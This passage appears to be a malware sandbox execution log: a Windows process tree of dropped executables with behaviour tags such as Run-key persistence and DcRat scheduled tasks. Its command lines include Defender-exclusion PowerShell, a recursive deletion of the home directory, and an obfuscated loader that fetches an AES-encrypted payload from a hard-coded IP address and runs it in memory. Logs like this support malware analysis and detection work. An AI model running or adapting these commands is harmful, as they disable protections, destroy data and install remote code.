C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 11446⤵
- Program crash
PID:364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 5166⤵
- Program crash
PID:4708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 10526⤵
- Program crash
PID:392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 11366⤵PID:3936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 5166⤵PID:7476
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 9604⤵
- Program crash
PID:2864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 7164⤵
- Program crash
PID:2928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 7404⤵
- Program crash
PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\rty25.exe"C:\Users\Admin\AppData\Local\Temp\rty25.exe"3⤵
- Executes dropped EXE
PID:4288
-
-
C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"3⤵PID:3688
-
-
C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe"C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Users\Admin\AppData\Local\Temp\nsb7D6F.tmpC:\Users\Admin\AppData\Local\Temp\nsb7D6F.tmp4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:32 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsb7D6F.tmp" & del "C:\ProgramData\*.dll"" & exit5⤵PID:5008
-
C:\Windows\SysWOW64\timeout.exetimeout /t 56⤵
- Delays execution with timeout.exe
PID:4540
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 32 -s 25605⤵
- Program crash
PID:1448
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\901d3bacbe82db5382c4f653efb11d4784254b3ad727530c73ae327b734c1a4b.exe"C:\Users\Admin\AppData\Local\Temp\Files\901d3bacbe82db5382c4f653efb11d4784254b3ad727530c73ae327b734c1a4b.exe"2⤵PID:492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 492 -s 3723⤵
- Program crash
PID:2308
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\setup.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:936
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe"C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2772 -
C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exeC:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe3⤵
- Executes dropped EXE
PID:2584
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exeC:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe3⤵
- Executes dropped EXE
PID:4692
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exeC:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe3⤵
- Executes dropped EXE
PID:3396
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exeC:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe3⤵
- Executes dropped EXE
PID:1392
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exeC:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe3⤵PID:4464
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exeC:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe3⤵
- Executes dropped EXE
PID:3996
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exeC:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe3⤵
- Executes dropped EXE
PID:3012
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exeC:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe3⤵
- Executes dropped EXE
PID:896
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exeC:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2960
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exeC:\Users\Admin\AppData\Local\Temp\Files\Awwnbpxqsf.exe3⤵
- Executes dropped EXE
PID:4600
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\%40Natsu338_alice.exe"C:\Users\Admin\AppData\Local\Temp\Files\%40Natsu338_alice.exe"2⤵PID:4628
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵PID:1820
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:4224 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵PID:3812
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /im chrome.exe /f4⤵
- Kills process with taskkill
PID:4976
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_academy';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_academy' -Value '"C:\Users\Admin\AppData\Local\Tests_for_preparation_for_the_academy\Tests_for_preparation_for_the_academy.exe"' -PropertyType 'String'3⤵
- Adds Run key to start application
PID:4936
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"2⤵PID:2668
-
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2152 -
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exeC:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exeC:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:1144 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 4724⤵
- Program crash
PID:2572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 4684⤵
- Program crash
PID:1432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Archevod_XWorm.exe"C:\Users\Admin\AppData\Local\Temp\Files\Archevod_XWorm.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Archevod_XWorm.exe'3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Archevod_XWorm.exe'3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'3⤵PID:2088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'3⤵PID:3964
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Roaming\msedge.exe"3⤵
- DcRat
- Creates scheduled task(s)
PID:3132
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe" & del "C:\ProgramData\*.dll"" & exit3⤵PID:4680
-
C:\Windows\SysWOW64\timeout.exetimeout /t 54⤵
- Delays execution with timeout.exe
PID:2572
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 24843⤵
- Program crash
PID:720
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\Files\toolspub1.exe"2⤵PID:4340
-
-
C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1836
-
-
C:\Users\Admin\AppData\Local\Temp\Files\83f32a3d2dc9e3d9903f395a20b8ddd74a1f35487c6dffd67d9d9a014961f9d0.exe"C:\Users\Admin\AppData\Local\Temp\Files\83f32a3d2dc9e3d9903f395a20b8ddd74a1f35487c6dffd67d9d9a014961f9d0.exe"2⤵PID:2200
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Voiceaibeta-5.13.exe"C:\Users\Admin\AppData\Local\Temp\Files\Voiceaibeta-5.13.exe"2⤵
- Executes dropped EXE
PID:3468 -
C:\Users\Admin\AppData\Local\Temp\Files\Voiceaibeta-5.13.exe"C:\Users\Admin\AppData\Local\Temp\Files\Voiceaibeta-5.13.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1628
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"2⤵
- Executes dropped EXE
PID:2288 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f3⤵
- DcRat
- Executes dropped EXE
- Checks SCSI registry key(s)
- Creates scheduled task(s)
- Suspicious behavior: MapViewOfSection
PID:2200
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:780 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- DcRat
- Creates scheduled task(s)
PID:2580
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\9.exe"C:\Users\Admin\AppData\Local\Temp\Files\9.exe"2⤵
- Executes dropped EXE
PID:3980 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 5883⤵
- Program crash
PID:32
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:244 -
C:\Windows\syspolrvcs.exeC:\Windows\syspolrvcs.exe3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:2872 -
C:\Users\Admin\AppData\Local\Temp\1673615808.exeC:\Users\Admin\AppData\Local\Temp\1673615808.exe4⤵
- Executes dropped EXE
PID:4564 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 2685⤵
- Program crash
PID:4752
-
-
-
C:\Users\Admin\AppData\Local\Temp\785413909.exeC:\Users\Admin\AppData\Local\Temp\785413909.exe4⤵
- Executes dropped EXE
PID:4684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe"C:\Users\Admin\AppData\Local\Temp\Files\c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\Files\c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe"C:\Users\Admin\AppData\Local\Temp\Files\c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4364 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 3684⤵
- Program crash
PID:2984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe"C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe"2⤵
- Executes dropped EXE
PID:3396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'3⤵PID:4636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵PID:2920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1CEF.tmp.bat""3⤵PID:200
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:3804
-
-
C:\ProgramData\common\JTPFKOXW.exe"C:\ProgramData\common\JTPFKOXW.exe"4⤵PID:4448
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'5⤵PID:976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'5⤵PID:1680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JTPFKOXW" /tr "C:\ProgramData\common\JTPFKOXW.exe"5⤵PID:1292
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JTPFKOXW" /tr "C:\ProgramData\common\JTPFKOXW.exe"6⤵
- DcRat
- Creates scheduled task(s)
PID:2736
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"2⤵PID:3996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 13723⤵
- Program crash
PID:5788
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe"C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe"2⤵PID:4388
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"2⤵PID:2408
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exeC:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe3⤵PID:2004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 4684⤵
- Program crash
PID:3484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 4804⤵
- Program crash
PID:4624
-
-
-
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"3⤵PID:2392
-
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exeC:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe4⤵PID:652
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe"C:\Users\Admin\AppData\Local\Temp\Files\hack1226.exe"2⤵PID:3048
-
-
C:\Users\Admin\AppData\Local\Temp\Files\123.exe"C:\Users\Admin\AppData\Local\Temp\Files\123.exe"2⤵PID:2648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"3⤵PID:2136
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"2⤵PID:472
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe3⤵PID:5684
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_technical_school';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_technical_school' -Value '"C:\Users\Admin\AppData\Local\Tests_for_preparation_for_technical_school\Tests_for_preparation_for_technical_school.exe"' -PropertyType 'String'3⤵PID:3760
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\987123.exe"C:\Users\Admin\AppData\Local\Temp\Files\987123.exe"2⤵PID:2620
-
-
C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Sharp_1_4.exe"C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Sharp_1_4.exe"2⤵PID:2652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 4683⤵
- Program crash
PID:1084
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"2⤵PID:4636
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = [System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);3⤵PID:3928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 17363⤵
- Program crash
PID:5568
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"2⤵PID:2960
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵PID:5200
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_academy';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_academy' -Value '"C:\Users\Admin\AppData\Local\Tests_for_preparation_for_the_academy\Tests_for_preparation_for_the_academy.exe"' -PropertyType 'String'3⤵PID:5252
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"2⤵PID:2284
-
-
C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe"C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe"2⤵PID:2620
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"3⤵PID:1984
-
-
C:\Users\Admin\AppData\Local\Temp\2e4fec2f-f054-4fde-8ec2-1755df2f3f8c.exe"C:\Users\Admin\AppData\Local\Temp\2e4fec2f-f054-4fde-8ec2-1755df2f3f8c.exe"3⤵PID:464
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\notepad.exe"C:\Users\Admin\AppData\Local\Temp\Files\notepad.exe"2⤵PID:1808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove-Item $HOME -Recurse3⤵PID:2392
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"2⤵
- Launches sc.exe
PID:200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵PID:5024
-
C:\Users\Admin\AppData\Local\Temp\Files\sc.exeC:\Users\Admin\AppData\Local\Temp\Files\sc.exe4⤵
- Launches sc.exe
PID:6140
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\uedfh12.exe"C:\Users\Admin\AppData\Local\Temp\Files\uedfh12.exe"2⤵PID:2144
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4256
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\btcgood.exe"C:\Users\Admin\AppData\Local\Temp\Files\btcgood.exe"2⤵PID:2392
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\btcgood.exe"3⤵PID:5336
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 30004⤵
- Runs ping.exe
PID:5244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe"C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe"2⤵PID:668
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"2⤵PID:6192
-
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:3020
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵PID:2008
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵PID:4240
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2332 -ip 23321⤵PID:3000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2332 -ip 23321⤵PID:3956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2332 -ip 23321⤵PID:3440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2332 -ip 23321⤵PID:4116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2332 -ip 23321⤵PID:2736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2332 -ip 23321⤵PID:2388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2332 -ip 23321⤵PID:1068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2332 -ip 23321⤵PID:1468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2332 -ip 23321⤵PID:4536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2332 -ip 23321⤵PID:2204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2332 -ip 23321⤵PID:3468
-
